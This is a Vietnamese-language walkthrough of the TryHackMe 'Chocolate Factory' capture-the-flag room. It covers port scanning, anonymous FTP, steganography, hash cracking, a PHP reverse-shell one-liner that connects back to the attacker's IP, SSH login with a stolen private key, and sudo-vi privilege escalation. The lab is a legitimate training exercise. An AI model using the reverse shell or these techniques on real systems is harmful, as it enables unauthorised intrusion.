Chocolate Factory – TryHackMe

 Welcome to Willy Wonka’s Chocolate Factory!

This room was designed so that hackers can revisit the Willy Wonka’s Chocolate Factory and meet Oompa Loompa

This is a beginner friendly room!

If you have any issues / queries you can reach us through Discord or Twitter.

( Created by AndyInfosec team for the community! )

Bước 1: Thu thập thông tin

Mình sử dụng nmap để dò quét cổng dịch vụ mạng:

nmap -T4 -sV -sC -p-  <tar-get>

Rất nhiều cổng dịch vụ được mở đặc biệt mình chú ý cổng 21,22,80

Bước 2: Khai thác dịch vụ FTP

Mình truy cập ftp với username mặc định anonymous

Có một tập tin ảnh gum_room.jpg mình tải về thử dùng công cụ phân tích ảnh để khai thác xem thế nào.

exiftool gum_room.jpg

Thấy một tập tin b64.txt, mình sử dụng steghide để giải nén lấy tệp tin ra và đọc

Đem mã này đi giải mã base64 mình thu được chuỗi các thông tin username và password giống nội dung của tệp /etc/passwd

Mình sử dụng john zipper để giải mã hàm băm mật khẩu của user Charlie

Nhưng buồn là mật khẩu này không thể SSH được. 🙁  🙁  🙁

Bước 3: Khai thác dịch vụ web

Truy cập website đây là một trang đăng nhập, kiểm tra thông tin qua mã nguồn không thể khai thác gì từ nó cả.

Mình kiểm tra xem có đường dẫn khác không bằng lệnh gobuster

Thấy đường dẫn home.php mình truy cập vào xem sao, phát hiện đây là trang có thể thực hiện lệnh bash shell trên linux

Mình phát hiện tệp tin key_rev_key mình giờ tìm cách reverse tcp kết nối tới máy victim để đọc nó xem sao

php -r '$sock=fsockopen("Your IP",Port);exec("/bin/sh -i <&3 >&3 2>&3");'

Sau khi vào hệ thống mình tiến hành đọc tệp tin key_rev_key

Một key và nó nên giữ lại thực hiện việc leo thăng tiếp theo của chúng ta.

Mình đến thư mục home và kiểm tra phát hiện user là charlies và thấy tệp tin private key ssh mình tải về máy tính của mình để thực hiện ssh tới máy victim

Bước 4: Khai thác dịch vụ SSH

Sau khi có tệp tin private key ssh mình sẽ thực hiện ssh tới máy victim với user charlies

chmod 600 id_rsa

ssh charlies@10.10.153.208 -i id_rsa

Sau đó mình sẽ đọc cờ đầu tiên

Sau đó mình thử dùng lệnh sudo -l

Lỗi phân quyền cho lệnh vi, lỗi này mình gặp ở bài rabbit year

Bước 5: Leo thăng đặc quyền

Sử dụng trang GTFOBins tìm lỗi lệnh vi.

Sau khi leo thăng mình tìm thư mục root thấy tệp root.py

Mình mở dọc thấy nó sử dụng một chương trình mã hóa và giải mã hiển thị cờ bằng python với thư viện là pyfiglet và fernet

Mình có tìm thấy một trang giả mã fernet để giải mã và thu được cờ với key tìm được ở bước 2 nhé.